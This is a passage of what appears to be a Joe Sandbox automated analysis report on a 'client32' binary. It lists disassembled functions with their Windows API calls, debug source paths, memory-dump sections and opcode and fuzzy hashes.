                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11017201
                                                                              • m_hWnd, xrefs: 11017206
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                              • API String ID: 819365019-3966830984
                                                                              • Opcode ID: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                              • Instruction ID: ca461658ff4ad9fd457e958dedcd80386c4d58b841a73ce1d2056031be29817f
                                                                              • Opcode Fuzzy Hash: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                              • Instruction Fuzzy Hash: 54E0C275A80329BBE2209681DC42FD6F38C9B05714F004435F6196A182D5B0F4408694
                                                                              Function 110141F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageA.USER32(?,00001205,00000000,?), ref: 1101421F
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 110141FE
                                                                              • m_hWnd, xrefs: 11014203
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
                                                                              • API String ID: 819365019-3507600817
                                                                              • Opcode ID: 45d04b9d47e171c164f04e5fe7f3ce9731aac29ce4d7bf167181722963fe8d9e
                                                                              • Instruction ID: 032d4df9316a5e8283d8688c6328372b319042290bc349747f778d43e7cc2059
                                                                              • Opcode Fuzzy Hash: 45d04b9d47e171c164f04e5fe7f3ce9731aac29ce4d7bf167181722963fe8d9e
                                                                              • Instruction Fuzzy Hash: B3E02B75B903287BD3209A81DC46FD7F39CDB04B55F004035F625AA581E6B1F450C794
                                                                              Function 11014270 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageA.USER32(?,00001202,?,00000000), ref: 1101429F
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 1101427E
                                                                              • m_hWnd, xrefs: 11014283
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
                                                                              • API String ID: 819365019-3507600817
                                                                              • Opcode ID: 6790253aba43e4d2d294870132a24e840559ef9fe61a4894bf3dc9e7539016be
                                                                              • Instruction ID: 7bc1a9946e64f754710be5ebc9e77f2b7f227168eeca9689bda6582359b448ca
                                                                              • Opcode Fuzzy Hash: 6790253aba43e4d2d294870132a24e840559ef9fe61a4894bf3dc9e7539016be
                                                                              • Instruction Fuzzy Hash: 30E0C275A50328BBD2209691DC46FD6F39C9B04755F008036F625AA181D6B0B8408694
                                                                              Function 11026130 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11026141
                                                                              • SetLastError.KERNEL32(00000078), ref: 11026157
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastProc
                                                                              • String ID: SetProcessDPIAware
                                                                              • API String ID: 199729137-3477150623
                                                                              • Opcode ID: c27a12ae67aa8f4c73138461e800a71dd05296353ad8864271ee7e96fb39bf7f
                                                                              • Instruction ID: a0b8e5f83d4182f1424546049561e52e6892c7ed8099c53223f80ed2ed61eebf
                                                                              • Opcode Fuzzy Hash: c27a12ae67aa8f4c73138461e800a71dd05296353ad8864271ee7e96fb39bf7f
                                                                              • Instruction Fuzzy Hash: 1AE0C231D412348FD7209FB8FC08786B7F4AF08715F02046AE991D3A44C730A8408B80
                                                                              Function 11016170 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 11016198
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • m_hImageList, xrefs: 11016182
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\imagelst.h, xrefs: 1101617D
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitIconImageLastList_MessageProcessReplacewsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\imagelst.h$m_hImageList
                                                                              • API String ID: 2426217062-4007669474
                                                                              • Opcode ID: 5113717a35f8a1ec747186b26df29046b32877a8f349f41facf259b61c2aef29
                                                                              • Instruction ID: 8e65b7ad63f8a8bd737c5e548218eb9c2c83e8f30b1cb0f0ee6871e24481aec6
                                                                              • Opcode Fuzzy Hash: 5113717a35f8a1ec747186b26df29046b32877a8f349f41facf259b61c2aef29
                                                                              • Instruction Fuzzy Hash: B8D02B756402297BC3108A88DC01FD5F38CCF15371F040336F961522C0D9B0A4408B94
                                                                              Function 11001120 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ShowWindow.USER32(?,?), ref: 1100114B
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001131
                                                                              • m_hWnd, xrefs: 11001136
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 1604732272-2830328467
                                                                              • Opcode ID: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                              • Instruction ID: 819250d5e51c5ae6cd1eebd62df6884d4c995cad7bb4673794d6e20848bff6e8
                                                                              • Opcode Fuzzy Hash: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                              • Instruction Fuzzy Hash: A0D02BB191032D7BC3048A81DC42ED6F3CCEB04365F004036F62656100D670E440C3D4
                                                                              Function 11001000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • KillTimer.USER32(?,?), ref: 1100102B
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                              • m_hWnd, xrefs: 11001016
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 2229609774-2830328467
                                                                              • Opcode ID: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
                                                                              • Instruction ID: 3936fa5a6487bcfb2675ba24450813cfe8c9b001fa673c8171921283ac7246b0
                                                                              • Opcode Fuzzy Hash: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
                                                                              • Instruction Fuzzy Hash: C8D02BB66003287BD320D681DC41ED6F3CCD708354F004036F51956100D5B0E840C390
                                                                              Function 11014170 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,00001200,00000000,00000000), ref: 1101419A
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 1101417B
                                                                              • m_hWnd, xrefs: 11014180
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
                                                                              • API String ID: 819365019-3507600817
                                                                              • Opcode ID: dd98e714131f01e1e3e9502ddc8d4ea3022c80635d59d6fdd5c37ba5f3223207
                                                                              • Instruction ID: 2522c449d059071d808e86b76c7b4b43721457dd443dfec71d59ac38f3b9efb9
                                                                              • Opcode Fuzzy Hash: dd98e714131f01e1e3e9502ddc8d4ea3022c80635d59d6fdd5c37ba5f3223207
                                                                              • Instruction Fuzzy Hash: A0D0A735F9033576E6205591AC4BFC5B2985B04B49F104165F121B90C1D2A0B4408648
                                                                              Function 11113160 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1111316A
                                                                              • SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 11113180
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FindMessageSendWindow
                                                                              • String ID: MSOfficeWClass
                                                                              • API String ID: 1741975844-970895155
                                                                              • Opcode ID: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
                                                                              • Instruction ID: 2732a125022ff7c0da3ed2a920369edb2684b905192db69b753ec1fccd0d92f1
                                                                              • Opcode Fuzzy Hash: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
                                                                              • Instruction Fuzzy Hash: FAD0127078430C77E6141AE1DE4EF96FB6C9744B65F004028F7159E4C5EAB4B44087BC
                                                                              Function 1115F310 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,000000A8,110AC717), ref: 1115F338
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DestroyErrorExitLastMessageProcessWindowwsprintf
                                                                              • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                              • API String ID: 1417657345-2201682149
                                                                              • Opcode ID: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
                                                                              • Instruction ID: 7db3f745f54082ef040700b2ebbb9d394f22af4f20fbf84319d784bae123f924
                                                                              • Opcode Fuzzy Hash: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
                                                                              • Instruction Fuzzy Hash: 9CD0A770A503359BD7608A56EC86BC6F2D4AB1221CF044479E0A362551E270F584C681
                                                                              Function 110161B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ImageList_GetImageCount.COMCTL32 ref: 110161CF
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
